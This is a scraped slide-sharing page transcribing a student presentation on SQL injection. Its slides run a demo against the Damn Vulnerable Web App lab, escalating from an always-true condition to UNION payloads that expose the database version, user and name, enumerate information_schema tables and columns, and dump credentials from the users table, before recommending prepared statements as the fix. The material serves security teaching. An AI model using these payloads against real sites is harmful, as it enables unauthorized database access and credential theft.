Presentation is loading. Please wait.

Presentation is loading. Please wait.

SQL Injection By Wenonah Abadilla.

Published byFrederica Murphy Modified over 7 years ago

Similar presentations

Presentation on theme: "SQL Injection By Wenonah Abadilla."— Presentation transcript:

1 SQL Injection By Wenonah Abadilla

2 Topics What is SQL What is SQL Injection Damn Vulnerable Web App
SQLI Demo Prepared Statements

3 What is SQL? Way you communicate with the database
Structured Query Language Access and manipulate databases COSC 341 at IUP

4 What is SQL Injection? One of the most serious threats for Web Application Inject SQL commands into an SQL statement, via web page input. Alters an SQL statement and compromises the security of a web application Common with PHP and ASP applications due to the prevalence of older functional interfaces Occurs when Data enters a program from an untrusted source. The data used to dynamically construct a SQL query SQL Injection Harvesting SQL statements to render sensitive data

5 Types of SQLI Error Based Union Based Blind
Causes an error and gather information from the error Union Based Combine two or more SQL statements into one result Blind Asking a true or false question

6 Consequences of SQL Injection
Confidentiality Authentication Authorization Integrity

7 Damn Vulnerable Web Site Demo
PHP/MySQL web application Aid for security professionals Test skills and tools in a legal environment Help developers better understand the process of securing web applications

8 $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”;

9 Basic Injection Webpage is supposed to print ID, First name, and Surname $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘1’”;

10 Always True Scenario Saying display all records that are false and all records that are true %’ – probably not equal to anything, and will be false ‘0’=‘0’ – Is equal to true, because 0 will always equal 0 $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=‘0’”;

11 Display Database Version
Notice the last displayed line This is the version of the mysql database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, version() # “;

12 Display Database User Notice the last displayed line
Name of the database user that executed the behind the scenes PHP code $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, user() # ;

13 Display Database Name Notice the last displayed line
This is the name of the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, database() # ;

14 Display All Tables in the information_schema
Displays all the tables in the information_schema database INFORMATION_SCHEMA is the informational database Stores information about all other databases that the MySQL server maintains $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables #” ;

15 Display All User Tables in the information_schema
Displays all tables that start with the prefix “user” in the information_schema database Quicker than looking through the previous output and manually looking for user table $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables where table_name like ‘user%’ #” ;

16 Display all Column fields in the User Table
Displays all the columns in the users table Notice- user_id, first_name, last_name, user and password column $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #” ;

17 Display column Field Contents in the user table
Successfully displayed all the necessary authentication information in the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null,concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #” ;

18 Prepared Statements and Bound Parameters
The query and the data are sent to the SQL server separately Parameterized statements, Parameterized SQL Template for SQL Statements Values can be plugged into the query after the query is “prepared” and ready to be executed (?), Bound Parameters Placeholders where actual values are plugged in

19 Examples PHP using PDO Java using JDBC
Statements sets “?” to an actual value that is stored in the id variable PHP using PDO Java using JDBC

20 Questions? Conclusion SQLI huge threat to web applications
Use Prepared SQL Statements Download Damn Vulnerable Web App Questions?

21 Reference Page "Coding Dynamic SQL Statements." Oracle Docs. Oracle, n.d. Web. 18 Feb < "(Damn Vulnerable Web App (DVWA): Lesson 6)." Computer Security Student. N.p., n.d. Web. 17 Feb < "PHP Prepared Statements." W3schools. N.p., n.d. Web. 18 Feb < "SQL Injection." OWASP. N.p., 14 Aug Web. 19 Feb < "SQL Injection." W3school. N.p., n.d. Web. 15 Feb <

Download ppt "SQL Injection By Wenonah Abadilla."

Similar presentations

Nic Shulver, Introduction to SQL Topics covered Structured Query Language What can it do? Advantages of SQL Why bother with SQL?

Nic Shulver, Introduction to SQL Topics covered Structured Query Language What can it do? Advantages of SQL Why bother with SQL?
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.

07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.

07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
CSC 2720 Building Web Applications Database and SQL.

CSC 2720 Building Web Applications Database and SQL.
Chapter 7 Managing Data Sources. ASP.NET 2.0, Third Edition2.

Chapter 7 Managing Data Sources. ASP.NET 2.0, Third Edition2.
The OWASP Foundation Injection Flaws.

The OWASP Foundation Injection Flaws.
SJSU CS157B Dr. Lee1  2004 Jenny Mitchell Two Useful Tools You Can’t Live Without by Jenny Mitchell SJSU CS157B Section 1 09-21-04 PHP and MySQL.

SJSU CS157B Dr. Lee1  2004 Jenny Mitchell Two Useful Tools You Can’t Live Without by Jenny Mitchell SJSU CS157B Section PHP and MySQL.
CSCI 6962: Server-side Design and Programming

CSCI 6962: Server-side Design and Programming
SQL Power Injector Avadanei AlinBalan Robert. What is SQL Power Injector ?  A graphical application created in C#.Net 1.1 that helps the penetration.

SQL Power Injector Avadanei AlinBalan Robert. What is SQL Power Injector ?  A graphical application created in C#.Net 1.1 that helps the penetration.
CSCI 6962: Server-side Design and Programming JDBC Database Programming.

CSCI 6962: Server-side Design and Programming JDBC Database Programming.
Copyright © 2003 Pearson Education, Inc. Slide 8-1 The Web Wizard’s Guide to PHP by David Lash.

Copyright © 2003 Pearson Education, Inc. Slide 8-1 The Web Wizard’s Guide to PHP by David Lash.
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 5 “Database and Cloud Security”.

Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 5 “Database and Cloud Security”.
Web Server Administration Chapter 7 Installing and Testing a Programming Environment.

Web Server Administration Chapter 7 Installing and Testing a Programming Environment.
Attacking Applications: SQL Injection & Buffer Overflows.

Attacking Applications: SQL Injection & Buffer Overflows.
Class 1Intro to Databases Goals of this class Understand the architecture behind web database applications Gain a basic understanding of what relational.

Class 1Intro to Databases Goals of this class Understand the architecture behind web database applications Gain a basic understanding of what relational.
PHP MySQL Introduction. MySQL is the most popular open-source database system. What is MySQL? MySQL is a database. The data in MySQL is stored in database.

PHP MySQL Introduction. MySQL is the most popular open-source database system. What is MySQL? MySQL is a database. The data in MySQL is stored in database.
MySQL Databases & PHP Integration Using PHP to write data to, and retrieve data from, a MySQL database.

MySQL Databases & PHP Integration Using PHP to write data to, and retrieve data from, a MySQL database.

Similar presentations

Ads by Google